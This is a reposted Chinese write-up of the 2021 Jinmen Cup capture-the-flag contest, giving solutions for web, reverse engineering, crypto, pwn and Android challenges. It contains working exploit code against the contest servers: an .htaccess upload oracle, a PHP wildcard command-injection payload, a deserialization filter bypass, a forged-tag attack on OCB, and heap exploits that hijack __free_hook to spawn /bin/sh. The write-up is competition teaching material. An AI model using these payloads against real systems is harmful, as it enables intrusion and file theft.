2021津⻔杯Writeup(详细版)

  • A+
所属分类:CTF专场


canWeb

    UploadHub

    hate_php

    GoOSS

    power_cut

RE

    GoodRE

    easyRe

Crypto

    混合编码

    justOCB

    rsa

Pwn

    pwnme

    PwnCTFM

    no1

    easypwn

Misc

    m1bmp

    m0usb

Mobile

    hellehellokey


0x01 WEB

1、UploadHub

import requestsimport stringimport hashlibip = requests.get('http://118.24.185.108/ip.php').textprint(ip)def check(a):f = '''<If "file('/flag')=~ /'''+a+'''/">ErrorDocument 404 "wupco"</If>'''resp = requests.post("http://122.112.248.222:20003/index.php?id=167",data={'submit': 'submit'}, files={'file': ('.htaccess',f)} )a = requests.get("http://122.112.248.222:20003/upload/"+ip+"/a").textif "wupco" not in a:return Falseelse:return Trueflag = "flag{BN"c = string.ascii_letters + string.digits + "{}"for j in range(32):for i in c:print("checking: "+ flag+i)if check(flag+i):flag = flag+iprint(flag)breakelse:continue


2、hate_php

直接通配符干上去

?code=?><?=`/???/???%20/????`?>


3、GoOSS

按照下这个payload就可以302跳转出去了,再利302跳转到127.0.0.1:80/index.php即可任意件读

取,获取flag

{"url": "http://127.0.0.1:1234u002f/test.d7cb7b72.y7z.xyz/../../813d620e0a68533883f897c4e03cf17c"}


4、power_cut

源码

<?phpclass logger{    public $logFile;    public $initMsg;    public $exitMsg;
function __construct($file){ // initialise variables $this->initMsg="#--session started--#n"; $this->exitMsg="#--session end--#n"; $this->logFile = $file; readfile($this->logFile);
}
function log($msg){ $fd=fopen($this->logFile,"a+"); fwrite($fd,$msg."n"); fclose($fd); }
function __destruct(){ echo "this is destruct"; }}
class weblog { public $weblogfile;
function __construct() { $flag="system('cat /flag')"; echo "$flag"; }
function __wakeup(){ // self::waf($this->filepath); $obj = new logger($this->weblogfile); }
public function waf($str){ $str=preg_replace("/[<>*#'|?n ]/","",$str); $str=str_replace('flag','',$str); return $str; }
function __destruct(){ echo "this is destruct"; }}
$log = $_GET['log'];$log = preg_replace("/[<>*#'|?n ]/","",$log);$log = str_replace('flag','',$log);$log_unser = unserialize($log);
?>

有一处迷惑点,但是weblog是序列化出来的,不会执行到__construct()方法,而是利用到logger里面的readfile函数,直接去读flag,str_replace的绕过双写就好了

exp:

<?php
class weblog { public $weblogfile = '/flflagag';
function __construct() { $flag="system('cat /flag')"; echo "$flag"; }
function __wakeup(){ // self::waf($this->filepath); $obj = new logger($this->weblogfile); }}
$a = new weblog();
echo serialize($a);

payload:

O:6:"weblog":1:{s:10:"weblogfile";s:9:"/flflagag";}

0x02 RE 

1、GoodRE

EA加密

import sysfrom ctypes import *from pwn import *def encipher(v, k):y = c_uint32(v[0])z = c_uint32(v[1])sum = c_uint32(0)delta = 0x9e3779b9n = 32w = [0,0]while(n>0):sum.value += deltay.value += ( z.value << 4 ) + k[0] ^ z.value + sum.value ^ (z.value >> 5 ) + k[1]z.value += ( y.value << 4 ) + k[2] ^ y.value + sum.value ^ (y.value >> 5 ) + k[3]n -= 1w[0] = y.valuew[1] = z.valuereturn w
def decipher(v, k):y = c_uint32(v[0])z = c_uint32(v[1])sum = c_uint32(0xc6ef3720)delta = 0x9e3779b9n = 32w = [0,0]while(n>0):z.value -= ( y.value << 4 ) + k[2] ^ y.value + sum.value ^ (y.value >> 5 ) + k[3]y.value -= ( z.value << 4 ) + k[0] ^ z.value + sum.value ^ (z.value >> 5 ) + k[1]sum.value -= deltan -= 1w[0] = y.valuew[1] = z.valuereturn wdef get_dec(v):key = [0x11] * 4s = decipher(v,key)res = ''for i in s:res += p32(i)[::-1].encode('hex').upper()return resif __name__ == "__main__":# v = [0x79AE1A3B,0x596080D3]print(get_dec([0x79AE1A3B,0x596080D3]))print(get_dec([0x80E03E80,0x846C8D73]))print(get_dec([0x21A01CF7,0xC7CACA32]))print(get_dec([0x45F9AC14,0xC5F5F22F]))

2、easyRe

算法:

seed = ~(53 * (2 * f[6] + f[15] + 3 * f[29])) & 0xFFFfor i in range(33):s[i] = (0x1ED0675 * seed + 0x6C1) % 0xFEseed = s[i]for i in range(32):for j in range(33):output[i + j] = (output[i + j] + (f[i] ^ s[j])) ^ 5977654

枚举seed,得到seed151

seed = 151magic = 5977654s = []for i in range(33):tmp = (0x1ED0675 * seed + 0x6C1) % 0xFEs.append(tmp)seed = tmpflag = [0 for i in range(32)]flag[0] = output[0] ^ magic ^ s[0]for k in range(1,32):last = 0for i in range(len(bbb[k])-1):last = (last + (flag[ bbb[k][i][0] ] ^ s[ bbb[k][i][1] ])) ^ magicflag[ k ] = ((output[k] ^ magic) - last) ^ s[ bbb[k][-1][1] ]for i in flag[:32]:print(chr(i&0xff),end='')

0x03 Crypto 

1、混合编码

import base64s =(base64.b64decode('JTJGMTAyJTJGMTA4JTJGOTclMkYxMDMlMkYxMjMlMkYxMTMlMkY0OSUyRjEyMCUyRjc1JTJGMTEyJTJGMTA5JTJGNTYlMkYxMTglMkY3MyUyRjc2JTJGODclMkYxMTQlMkYxMDclMkYxMDklMkY4OCUyRjEyMCUyRjg2JTJGNTQlMkYxMDYlMkY0OSUyRjQ5JTJGNzclMkYxMDAlMkY5OSUyRjcxJTJGMTE2JTJGNzYlMkYxMjIlMkYxMTglMkY4MiUyRjEyMSUyRjg2JTJGMTI1'))print(''.join(map(lambda x:chr(int(x)), s.split(b'%2F')[1:])))


2021津⻔杯Writeup(详细版)

ciphertext, tag =encrypt("I_am_admin_plz_give_me_the_flag", "From user")

想要getflag,唯的区别是associate_data导致的Auth不同,Auth =pmac(associate_data)

只要能构造new_tag = tag ^ pmac("From user")^ pmac("From admin")

def pmac(data):offset = aes.encrypt(b"x00"*16)offset = times3(offset)offset = times3(offset)offset = times2(offset)data += long_to_bytes(int('10000...00', 2)) # 补⻬到16offset = times3(offset)offset = times3(offset)final_xor = xor(offset, data)return aes.encrypt(final_xor)def pmac(data):offset = aes.encrypt(b"x00"*16)offset = times3(offset)offset = times3(offset)offset = times2(offset)data += long_to_bytes(int('10000...00', 2)) # 补⻬到16offset = times3(offset)offset = times3(offset)final_xor = xor(offset, data)return aes.encrypt(final_xor)


nonce可以复

需要能够对于任意的msg,可以得到aes.encrypt(msg),实现任意明加密

需要知道Δ,为此考虑:

m1 = len,可以得到c1 = m1 ^ aes.encrypt(len ^ Δ)

m1 = len, m2 =b"x00"*16,可以得到c1' = Δ ^aes.encrypt(len ^ Δ)

因此Δ = c1' ^ len ^ c1

有了Δ后,构造m1 = msg ^ Δ,可以得到c1 = Δ ^ aes.encrypt(msg),即aes.encrypt(msg) = c1 ^ Δ,实现任

意明加密

回到pmac中,对b"x00"*16加密,以及对final_xor加密即可得到“Fromadmin""From user"Auth,进

计算出相应的tag

import mathfrom hashlib import sha256from itertools import productfrom pwn import *# context.log_level = 'debug'conn = remote("122.112.199.24", 9999)# conn = remote("127.0.0.1", 9999)def proof_of_work():s = string.ascii_letters + string.digitsrec = conn.recvline().decode()suffix = re.findall(r'(XXXX+(.*?))', rec)[0]digest = re.findall(r'== (.*?)n', rec)[0]print(f"suffix: {suffix} ndigest: {digest}")print('Calculating hash...')for i in product(s, repeat=4):prefix = ''.join(i)guess = prefix + suffixif sha256(guess.encode()).hexdigest() == digest:print(guess)breakconn.sendlineafter(b'Give me XXXX:', prefix.encode())def choice1(msg):nonce = bytearray([0]*16)conn.recvuntil(b"Your choice:")conn.sendline(b"1")conn.sendlineafter(b"Your nonce:", nonce.hex().encode())conn.sendlineafter(b"Your message:", msg.hex().encode())conn.recvuntil(b"Your ciphertext:",)cipher = bytes.fromhex(conn.recvline().strip().decode())conn.recvuntil(b"Your tag:",)tag = bytes.fromhex(conn.recvline().strip().decode())return tag, cipherdef choice2(tag, cipher):nonce = bytearray([0]*16)conn.recvuntil(b"Your choice:")conn.sendline(b"2")conn.sendlineafter(b"Your nonce:", nonce.hex().encode())conn.sendlineafter(b"Your ciphertext:", cipher.hex().encode())conn.sendlineafter(b"Your tag:", tag.hex().encode())conn.interactive()def xor(a,b):return bytearray(x^y for x,y in zip(a,b))def times2(input_data):blocksize = 16assert len(input_data) == blocksize# set carry = high bit of srcoutput = bytearray(blocksize)carry = input_data[0] >> 7 # either 0 or 1for i in range(len(input_data) - 1):output[i] = ((input_data[i] << 1) | (input_data[i + 1] >> 7)) %256output[-1] = ((input_data[-1] << 1) ^ (carry * 0x87)) % 256assert len(output) == blocksizereturn outputdef times3(input_data):assert len(input_data) == 16output = times2(input_data)output = xor(output, input_data)assert len(output) == 16return outputdef aes_encrypt(msg, delta):m1 = xor(msg+bytearray([0]*16), delta)_, c1 = choice1(m1)return xor(c1[:16], delta)def aes_encrypt2(m1, m2, delta):msg = xor(m1, delta) + xor(m2, times2(delta)) + bytearray([0]*16)_, cipher = choice1(msg)c1 = xor(cipher[:16], delta)c2 = xor(cipher[16:32], times2(delta))return c1, c2def cal_delta():_len = bytearray([0]*15 + [16*8])_, c1 = choice1(_len)_, c11 = choice1(_len + bytearray([0]*16))c11 = c11[:16]delta = xor(xor(c11, _len), c1)return deltadef cal_final_xor(header, delta):blocksize = 16m = 1offset = delta # delta = times2(offset),减少⼀次choice1的交互次数offset = times3(offset)offset = times3(offset)checksum = bytearray(blocksize)# check if full blockH_m = header[((m - 1) * blocksize):]assert len(H_m) <= blocksizeif len(H_m) == blocksize:# complete last block# this is only possible if m is 1offset = times3(offset)checksum = xor(checksum, H_m)else:# incomplete last block# pad with separator binary 1# then pad with zeros until full blockH_m.append(int('10000000', 2))while len(H_m) < blocksize:H_m.append(0)assert len(H_m) == blocksizechecksum = xor(checksum, H_m)offset = times3(offset)offset = times3(offset)# Compute PMAC resultfinal_xor = xor(offset, checksum)return final_xordef main():proof_of_work()# conn.interactive()delta = cal_delta()log.info(f"delta: {delta}")# -----------------------------------from_user = bytearray(b"From user")from_admin = bytearray(b"From admin")final_xor_user = cal_final_xor(from_user, delta)final_xor_admin = cal_final_xor(from_admin, delta)auth_user, auth_admin = aes_encrypt2(final_xor_user, final_xor_admin,delta)log.info(f"auth_user: {auth_user}")log.info(f"auth_admin: {auth_admin}")# ---------------------------------------tag, cipher = choice1(bytearray(b"I_am_admin_plz_give_me_the_flag"))new_tag = xor(xor(tag, auth_user), auth_admin)log.info(f"cipher: {cipher}ntag: {tag}nnew_tag: {new_tag}")choice2(new_tag, cipher)if __name__ == "__main__":

Your flag:flag{2105fde8-5ba4-4fa9-a5cb-a1af5427ec4e}


2、rsa

Wiener Attack

import mathfrom Crypto.Util.number import long_to_bytesdef recover(e,N):cf = continued_fraction(e/N).convergents()G.<x> = ZZ['x']for index, k in enumerate(cf[1:]):d0 = k.denominator()k = k.numerator()if k != 0 and (e * d0 - 1) % k == 0:phi = (e*d0 - 1) //ks = (N-phi+1)f = x^2 - s*x + Nb = f.discriminant()if b > 0 and b.is_square():d = d0roots = list(zip(*f.roots()))[0]if len(roots) == 2 and prod(roots) == N:print("[x] Recovered! nd = %0x" %d)return delse:continueprint("[] Could not determine the value of d with the parameters given.Make sure that d < 1/3 * N ^ 0.25")return -1def wiener(c,e,N):d = recover(e,N)return Integer(pow(c,d,N))def test():c=58703794202217708947284241025731347400180247075968200121227051434588274043273799724484183411072837136505848853313100468119277511144235171654313035776616454960333999039452491921144841080778960041199884823368775400603713982137807991048133794452060951251851183850000091036462977949122345066992308292574341196418e=119393861845960762048898683511487799317851579948448252137466961581627352921253771151013287722073113635185303441785456596647011121862839187775715967164165508224247084850825422778997956746102517068390036859477146822952441831345548850161988935112627527366840944972449468661697184646139623527967901314485800416727n=143197135363873763765271313889482832065495214476988244056602939316096558604072987605784826977177132590941852043292009336108553058140643889603639640376907419560005800390316898478577088950660088975625569277320455499051275696998681590010122458979436183639691126624402025651761740265817600604313205276368201637427m = wiener(c,e,n)print(long_to_bytes(m))test()


0x01 Pwn

1、pwnme

2021津⻔杯Writeup(详细版)

这边的size可以是负数,enc_off 也能是负数。

但负数这边memcpy会崩

当第dec_off == last_dec_off时可以绕过检查越界写

POC:

from pwn import *p = process('./loader')def getf(sec,dec_off,size,enc_off):re = (p16(0x5a4d).ljust(0x3c,'x00')+p32(0x50)).ljust(0x50,'x00')#headerre += (p32(0x4550)+p16(0x14c)+p32(sec)).ljust(0xf8,'x00')#infore += p64(0)+p32(0)+p32(dec_off)+p32(size)+p32(enc_off)+p64(0)*2#enc_bufreturn redef addenc(dec_off,size,enc_off):return p64(0)+p32(0)+p32(dec_off)+p32(size)+p32(enc_off)+p64(0)*2#enc_bufdef load(idx,name,size,data):p.recvuntil('>>')p.sendline('1')p.recvuntil('index')p.sendline(str(idx))p.recvuntil('name')p.send(name)p.recvuntil('size')p.sendline(str(size))p.recvuntil('data')p.send(data)def dele(idx):p.recvuntil('>>')p.sendline('5')p.recvuntil('index')p.sendline(str(idx))a = getf(1,0xfffffffe,0x1,0x10)la = len(a)#print laload(0,'aaan',la,a)a = getf(1,0,0x170,0)la = len(a)print laload(1,'bbbn',la,a)a = getf(1,0,0x170,0)la = len(a)print laload(2,'cccn',la,a)a = getf(1,0,0x170,0)la = len(a)print laload(3,'bbbn',la,a)dele(1)dele(2)dele(3)a = getf(1,0,0x50,0)la = len(a)print laload(1,'bbbn',la,a)a = getf(1,0,0x50,0)la = len(a)print laload(2,'cccn',la,a)a = getf(1,0,0x50,0)la = len(a)print laload(3,'bbbn',la,a)dele(1)dele(2)dele(3)a = getf(1,0,0x50,0)la = len(a)print laload(1,'cccn',la,a)a = getf(2,0,0x50,0)+addenc(0,0xa0,0)la = len(a)print laload(2,'xxxn',la,a)#overflowp.interactive()
#coding=utf-8from pwn import *from docker_debug import *#context.terminal = ['tmux', 'splitw', '-h']context.log_level = 'debug'context.aslr = Falsedebug_env = DockerDebug('ubuntu-1604')process = debug_env.processattach = debug_env.attachdef my_load(p, idx, name, size, data):p.recvuntil('>> ')p.sendline('1')p.recvuntil('index: ')p.sendline(str(idx))p.recvuntil('name: ')p.send(name)p.recvuntil('size: ')p.sendline(str(size))p.recvuntil('data: ')p.send(data)def delete(p, idx):p.recvuntil('>> ')p.sendline('5')p.recvuntil('index: ')p.sendline(str(idx))def run(p, idx):p.recvuntil('>> ')p.sendline('4')p.recvuntil('index: ')p.sendline(str(idx))def edit(p, idx, name, vaddr, size, data):p.recvuntil('>> ')p.sendline('3')p.recvuntil('index: ')p.sendline(str(idx))p.recvuntil('name: ')p.send(name)p.recvuntil('vaddr: ')p.sendline(str(vaddr))p.recvuntil('size: ')p.sendline(str(size))p.recvuntil('data: ')p.send(data)def gen_section_header(virtual_address, size_of_raw_data,pointer_to_raw_data):section_header = b'a'*0xc + p32(virtual_address) +p32(size_of_raw_data) + p32(pointer_to_raw_data)section_header = section_header.ljust(0x28, b'x00')return section_headerdef main():libc = ELF('./libc-2.23.so', checksec=False)p = remote('119.3.81.43', 2399)#p = process('./loader')dos_header = b'MZ'.ljust(0x3c, b'x00') + p32(0x40)secNumber = 1fileHeader = p16(0x14c) + p16(secNumber)fileHeader = fileHeader.ljust(0x14, b'x00')pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0, 0, 0)my_load(p, 0, b'pluslsn', len(payload), payload)my_load(p, 1, b'pluslsn', len(payload), payload)delete(p, 1)pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0x168, 0, 0)payload = payload.ljust(0x1f8, b'x00')my_load(p, 1, b'pluslsn', len(payload + b'a'*0x10), payload +b'a'*0x10)delete(p, 0)dos_header = b'MZ'.ljust(0x3c, b'x00') + p32(0x40)secNumber = 2fileHeader = p16(0x14c) + p16(secNumber)fileHeader = fileHeader.ljust(0x14, b'x00')pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0, 0x188, 0)data = b'z'*0x1f0data = encrypt_data(data, 1)payload += gen_section_header(0, len(data), len(dos_header +pe_header) + 0x28*2)payload += datapayload = payload.ljust(0x6f0, b'x00')my_load(p, 0, b'pluslsn', len(payload), payload)run(p, 1)p.recvuntil(b'z'*0x60)libc_base = u64(p.recvuntil(' is running', drop=True).ljust(8,b'x00')) - 0x3c4cd8libc.address = libc_baselog.success('{:#x}'.format(libc_base))my_load(p, 2, b'pluslsn', 0x18, b'a'*0x18)dos_header = b'MZ'.ljust(0x3c, b'x00') + p32(0x40)secNumber = 1fileHeader = p16(0x14c) + p16(secNumber)fileHeader = fileHeader.ljust(0x14, b'x00')pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0, 0, 0)my_load(p, 2, b'fuck1n', len(payload), payload)my_load(p, 3, b'fuck2n', len(payload), payload)delete(p, 3)pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0x168, 0, 0)payload = payload.ljust(0x1f8, b'x00')my_load(p, 3, b'fuck2n', len(payload + b'a'*0x10), payload +b'a'*0x10)delete(p, 2)dos_header = b'MZ'.ljust(0x3c, b'x00') + p32(0x40)secNumber = 2fileHeader = p16(0x14c) + p16(secNumber)fileHeader = fileHeader.ljust(0x14, b'x00')pe_header = b'PEx00x00' + fileHeaderpe_header = pe_header.ljust(0xf8, b'x00')payload = dos_header + pe_headerpayload += gen_section_header(0, 0x188, 0)data = b'F'*0x190 + b'q'*0x30 + p64(libc.sym['__free_hook'] + 0x8) +p64(0) + p64(libc.sym['__free_hook']) + p64(0x1000)data = encrypt_data(data, 1)payload += gen_section_header(0, len(data), len(dos_header +pe_header) + 0x28*2)payload += datapayload = payload.ljust(0x6f0, b'x00')my_load(p, 2, b'pluslsn', len(payload), payload)edit(p, 3, b'pluslsn', 0, 0x10, p64(libc.sym['system']) +b'/bin/shx00')delete(p, 3)p.interactive()def encrypt_data(data, ch):ret = b''for i in range(len(data)):ret += p8(((data[i] - i) % 256) ^ ch ^ 0x39)return retif __name__ == '__main__':main()


剩下几题PWN较复杂,文末附参考链接


0x05 Misc

2021津⻔杯Writeup(详细版)

2021津⻔杯Writeup(详细版)

0x06 Mobile

hellehellokey

360加固,脱壳

key都给了,抄⼀下解密算法

import java.math.BigDecimal;import java.util.Arrays;import java.security.Key;import java.security.SecureRandom;import java.security.Security;import java.security.InvalidAlgorithmParameterException;import java.security.InvalidKeyException;import java.security.Key;import java.security.KeyStoreException;import java.security.NoSuchAlgorithmException;import java.security.NoSuchProviderException;import java.security.SecureRandom;import java.security.UnrecoverableEntryException;import java.security.cert.CertificateException;import java.security.spec.InvalidKeySpecException;import javax.crypto.BadPaddingException;import javax.crypto.Cipher;import javax.crypto.IllegalBlockSizeException;import javax.crypto.NoSuchPaddingException;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import java.math.BigInteger;import java.util.Base64;import java.util.Base64.Decoder;import org.bouncycastle.jce.provider.BouncyCastleProvider;public class HelloWorld {public static BigDecimal ca(BigDecimal[][] arg6) {return arg6[0][0].multiply(arg6[1][1]).multiply(arg6[2][2]).subtract(arg6[0][0].multiply(arg6[1][2]).multiply(arg6[2][1])).subtract(arg6[0][1].multiply(arg6[1][0]).multiply(arg6[2][2])).add(arg6[0][1].multiply(arg6[1][2]).multiply(arg6[2][0])).add(arg6[0][2].multiply(arg6[1][0]).multiply(arg6[2][1])).subtract(arg6[0][2].multiply(arg6[1][1]).multiply(arg6[2][0]));}public static Key AAA(String arg4, byte[] aa) throwsInvalidKeySpecException, NoSuchPaddingException, InvalidKeyException,NoSuchAlgorithmException {Security.addProvider( new BouncyCastleProvider());System.out.println(new SecureRandom().generateSeed(8));// Security.insertProviderAt(new BouncyCastleProvider(), 1);PBEKeySpec v0 = new PBEKeySpec(arg4.toCharArray(), aa, 10000,0x80);return SecretKeyFactory.getInstance("PBEWITHSHA256AND128BITAES-CBC-BC").generateSecret(v0);}public static void main(String []args) throws InvalidKeyException,BadPaddingException, NoSuchAlgorithmException, NoSuchPaddingException,InvalidKeySpecException, IllegalBlockSizeException {System.out.println("a");String v1 ="-5318281467173987652_AWCi9lUPkJtHXiNJahfmbp0uI3NfTw6C+xtqctVioZBf9Oa56x/lHRDRJg7eAKfL";String[] v2222 = {"45643_146929454710883133724439317","5141_146806547890187159627936211","12657_146808996664410987156248503","59203_147074971414771841621238397","3599_146806432347879873041767617","59190_147074794513918416536895817","34014_146857310776799437987522057"};BigDecimal[] v4_3 = new BigDecimal[7];BigDecimal[] v3_2 = new BigDecimal[7];int v7_1;for(v7_1 = 0; true; ++v7_1) {String[] v8_4 = v2222;if(v7_1 >= v8_4.length) {break;}String[] v8_5 = v8_4[v7_1].split("_");v4_3[v7_1] = new BigDecimal(v8_5[0]);v3_2[v7_1] = new BigDecimal(v8_5[1]);}BigDecimal[] v2R = v4_3;BigDecimal[] v2S = v3_2;BigDecimal[][] v3_3 = new BigDecimal[4][4];BigDecimal[][] v4_4 = new BigDecimal[4][4];BigDecimal v7_2 = new BigDecimal("1");int v9_1;for(v9_1 = 0; v9_1 < 4; ++v9_1) {int v11;for(v11 = 0; v11 < 4; ++v11) {if(v11 == 0) {v3_3[v9_1][v11] = v2S[v9_1];v4_4[v9_1][v11] = v7_2;}else {v3_3[v9_1][v11] = v2R[v9_1].pow(v11);v4_4[v9_1][v11] = v2R[v9_1].pow(v11);}}}BigDecimal[] v2_1 = new BigDecimal[4];BigDecimal v7_3 = new BigDecimal("1");int v8_6;for(v8_6 = 0; v8_6 < 4; ++v8_6) {v2_1[v8_6] = v4_4[v8_6][1];}int v4_5 = 1;Arrays.sort(((Object[])v2_1));int v6 = 3;while(v6 >= v4_5) {int v4_6 = v6 - 1;int v8_7;for(v8_7 = v4_6; v8_7 >= 0; --v8_7) {v7_3 = v7_3.multiply(v2_1[v6].subtract(v2_1[v8_7]));}v6 = v4_6;v4_5 = 1;}BigDecimal[][] v2_2 = new BigDecimal[3][3];BigDecimal[][] v4_7 = new BigDecimal[3][3];BigDecimal[][] v6_1 = new BigDecimal[3][3];BigDecimal[][] v8_8 = new BigDecimal[3][3];int v9_2;for(v9_2 = 0; v9_2 < v3_3.length; ++v9_2) {int v11_1;for(v11_1 = 0; v11_1 < v3_3.length; ++v11_1) {if(v9_2 != 0 && v11_1 != 0) {v2_2[v9_2 - 1][v11_1 - 1] = v3_3[v9_2][v11_1];}if(v9_2 != 0 && v11_1 != 1) {if(v11_1 == 0) {v4_7[v9_2 - 1][v11_1] = v3_3[v9_2][v11_1];}else {v4_7[v9_2 - 1][v11_1 - 1] = v3_3[v9_2][v11_1];}}if(v9_2 != 0 && v11_1 != 2) {if(v11_1 != 1 && v11_1 != 0) {v6_1[v9_2 - 1][v11_1 - 1] = v3_3[v9_2][v11_1];}else {v6_1[v9_2 - 1][v11_1] = v3_3[v9_2][v11_1];}}if(v9_2 != 0 && v11_1 != 3) {v8_8[v9_2 - 1][v11_1] = v3_3[v9_2][v11_1];}}}BigDecimal v2_3 = v3_3[0][0].multiply(ca(v2_2)).subtract(v3_3[0][1].multiply(ca(v4_7))).add(v3_3[0][2].multiply(ca(v6_1))).subtract(v3_3[0][3].multiply(ca(v8_8)));if(v2_3.doubleValue() < 0) {v7_3 = v7_3.multiply(new BigDecimal("-1"));}System.out.println(v2_3.divide(v7_3, 4));String v0j0 = new String(v2_3.divide(v7_3,4).toBigInteger().toByteArray());String v2_5 = v0j0;String v3_5 = v1.split("_")[1];byte[] AA = new BigInteger(v1.split("_")[0]).toByteArray();Decoder decoder = Base64.getDecoder();//sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();//byte[] v1_1 = Base64.decode(v3_5, 2);// byte[] v1_1 = decoder.decode(v3_5);byte[] v1_1 = {(byte)1, (byte)96, (byte)162, (byte)246, (byte)85,(byte)15, (byte)144, (byte)155, (byte)71, (byte)94, (byte)35, (byte)73,(byte)106, (byte)23, (byte)230, (byte)110, (byte)157, (byte)46, (byte)35,(byte)115, (byte)95, (byte)79, (byte)14, (byte)130, (byte)251, (byte)27,(byte)106, (byte)114, (byte)213, (byte)98, (byte)161, (byte)144, (byte)95,(byte)244, (byte)230, (byte)185, (byte)235, (byte)31, (byte)229, (byte)29,(byte)16, (byte)209, (byte)38, (byte)14, (byte)222, (byte)0, (byte)167,(byte)203};System.out.println(v3_5);// System.out.println(v1_1);System.out.println(v2_5);Security.addProvider( new BouncyCastleProvider());Key v2_6 = AAA(v2_5, AA);System.out.println(v2_6);Cipher v3_6 = Cipher.getInstance("PBEWITHSHA256AND128BITAES-CBC-BC");v3_6.init(2, v2_6);String vvv = new String(v3_6.doFinal(v1_1));System.out.println(vvv);}}


参考:

https://blog.csdn.net/m0_51078229

“津⻔杯Writeup - Nu1L”

https://mp.weixin.qq.com/s/q10w7BrqBQzWMd91d0d6QA


本文始发于微信公众号(Hacking黑白红):2021津⻔杯Writeup(详细版)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: